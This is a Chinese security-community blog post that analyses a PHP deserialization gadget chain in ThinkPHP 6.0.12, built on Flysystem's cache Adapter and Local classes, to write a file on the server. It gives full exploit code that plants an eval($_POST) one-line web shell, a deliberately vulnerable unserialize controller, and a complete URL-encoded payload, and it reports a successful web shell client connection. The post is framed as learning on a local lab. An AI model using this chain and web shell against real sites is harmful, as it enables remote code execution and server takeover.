暂无简介
tp框架6.0.12是LTS版本,长期维护,所以,值得多一些钻研,因此也是心血来潮尝试了一番,看到有师傅发了RCE的poc链,因为学习6.0.9的时候看到过getshell的,所以想着把这个版本的getshell也找一下,试着写了这个文章,请各位师傅多指点。
1.准备工作
thinkphp框架的源码都要用composer下载,虽然比复制粘贴步骤稍稍多一点,但是,也很方便
具体如何安装composer就不在这里赘述了,看这里学习即可https://www.phpcomposer.com/ (中国镜像站)
安装命令:composer create-project topthink/think tp6 6.0.12
2.找反序列化入口点
说到入口点,都是__destruct()
,以此触发下一步函数的执行
如图所示,所有的可能目标如下图,但是注意:并不是入口目标只有下面几个,要知道下面有很多类都是抽象类
也就是说,真正的入口很大程度上是他们的子类等,这样看入口就多了很多。
先大概捋一遍,可以看到abstract class AbstractCache这个抽象类的析构方法中,调用了save方法
但是该抽象类中并没有save方法,也就是说,其实是子类调用了save方法
通过查找子类,找到下图:
搜索语句:extends AbstractCache
进一步发现这个Adapter有一个save方法,而且,看方法结构就基本上可以断定是一个写文件的操作。
重点是,adapter可控,且只需要保证has方法返回false即可。
3.确定链路
通过刚刚的链路继续跟进,因为adapter拥有write方法,我们要找到一个有write方法的类
当在可选范围中浏览的时候发现,class Local extends AbstractAdapter里的write方法,直接就调用写文件的函数了。
write函数解决了,整个链条应该就通顺了:
整体的调用流程如图所示:(大图更清晰)
4.构建poc链并实现getshell
入口部分如下:
//入口点位置:
namespace League\Flysystem\Cached\Storage
{
abstract class AbstractCache
{
//属性值为false,才可以调用该save方法
protected $autosave = false;
// 一句话代码,也是最后写入文件的内容
protected $cache = ['<?php eval($_POST[\''.'yyds'.'\']);?>'];
protected $complete = [];
public function cleanContents(array $contents)
{
$cachedProperties = array_flip([
'path', 'dirname', 'basename', 'extension', 'filename',
'size', 'mimetype', 'visibility', 'timestamp', 'type',
'md5',
]);
foreach ($contents as $path => $object) {
if (is_array($object)) {
$contents[$path] = array_intersect_key($object, $cachedProperties);
}
}
return $contents;
}
public function __destruct()
{
//autoSave参数为false
if (! $this->autosave) {
$this->save();
}
}
}
use League\Flysystem\AdapterInterface;
use League\Flysystem\Config;
class Adapter extends AbstractCache
{
//适配器,也就是我们要利用write方法的类
protected $adapter;
protected $expire = null;
//文件名,写入文件的文件名
protected $file = 'abcd.php';
public function __construct($local)
{
//方便生成的属性为local类对象,所以直接写到构造方法里了
$this->adapter = $local;
}
public function getForStorage()
{
//不用担心这个函数,它也没把我们的写入的内容怎么地
$cleaned = $this->cleanContents($this->cache);
return json_encode([$cleaned, $this->complete, $this->expire]);
}
public function save()
{
$config = new Config();//为了方便,这个参数可以随便写一下,
//但是如果随便写,下面的write定义的部分记得把传参约定的类型去掉(要不然php7过不了)
$contents = $this->getForStorage();
if ($this->adapter->has($this->file)) {
$this->adapter->update($this->file, $contents, $config);
} else {
$this->adapter->write($this->file, $contents, $config);
}
}
}
}
Local类的方法:
namespace League\Flysystem\Adapter
{
abstract class AbstractAdapter
{
protected $pathPrefix;
public function getPathPrefix()
{
return $this->pathPrefix;
}
public function applyPathPrefix($path)
{
return $this->getPathPrefix() . ltrim($path, '\\/');
}
}
class Local extends AbstractAdapter
{
protected $permissionMap;
protected $writeFlags;
public function has($path)
{
$location = $this->applyPathPrefix($path);
return file_exists($location);
}
protected function ensureDirectory($root)
{
if ( ! is_dir($root)) {
$umask = umask(0);
if ( ! @mkdir($root, $this->permissionMap[‘dir’][‘public’], true)) {
$mkdirError = error_get_last();
}
umask($umask);
clearstatcache(false, $root);
if ( ! is_dir($root)) {
$errorMessage = isset($mkdirError[‘message’]) ? $mkdirError[‘message’] : ‘’;
throw new Exception(sprintf(‘Impossible to create the root directory “%s”. %s’, $root, $errorMessage));
}
}
}
public function write($path, $contents, $config)//这个$config的约定类型可以去掉,为了方便
{
//这个调用是没所谓,$path就是传入的文件名,不过要确保文件名是否冲突,所以,每次调用,写入文件的文件名换一下
$location = $this->applyPathPrefix($path);
$this->ensureDirectory(dirname($location));
if (($size = file_put_contents($location, $contents, $this->writeFlags)) === false) {
return false;
}
//省略部分,后面的代码不影响结构,所以直接删掉了
}
}
}
然后获取poc
namespace
{
use League\Flysystem\Adapter\Local;
use League\Flysystem\Cached\Storage\Adapter;
$local = new Local();
echo urlencode(serialize((new Adapter($local))));
}
然后写一个控制器,调用反序列化:
public function testuns()
{
unserialize(urldecode($_GET['yyds']));
}
访问链接:
http://www.tpstudy6012.com/index.php/index/testuns?yyds=O%3A39%3A%22League%5CFlysystem%5CCached%5CStorage%5CAdapter%22%3A6%3A%7Bs%3A10%3A%22%00%2A%00adapter%22%3BO%3A30%3A%22League%5CFlysystem%5CAdapter%5CLocal%22%3A3%3A%7Bs%3A16%3A%22%00%2A%00permissionMap%22%3BN%3Bs%3A13%3A%22%00%2A%00writeFlags%22%3BN%3Bs%3A13%3A%22%00%2A%00pathPrefix%22%3BN%3B%7Ds%3A9%3A%22%00%2A%00expire%22%3BN%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A8%3A%22abcd.php%22%3Bs%3A11%3A%22%00%2A%00autosave%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00cache%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A29%3A%22%3C%3Fphp+eval%28%24_POST%5B%27yyds%27%5D%29%3B%3F%3E%22%3B%7Ds%3A11%3A%22%00%2A%00complete%22%3Ba%3A0%3A%7B%7D%7D
执行结果如下:
蚁剑也能连接成功:
- 本文作者: 维生素泡腾片
- 本文来源: 先知社区
- 原文链接: https://xz.aliyun.com/t/11531
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!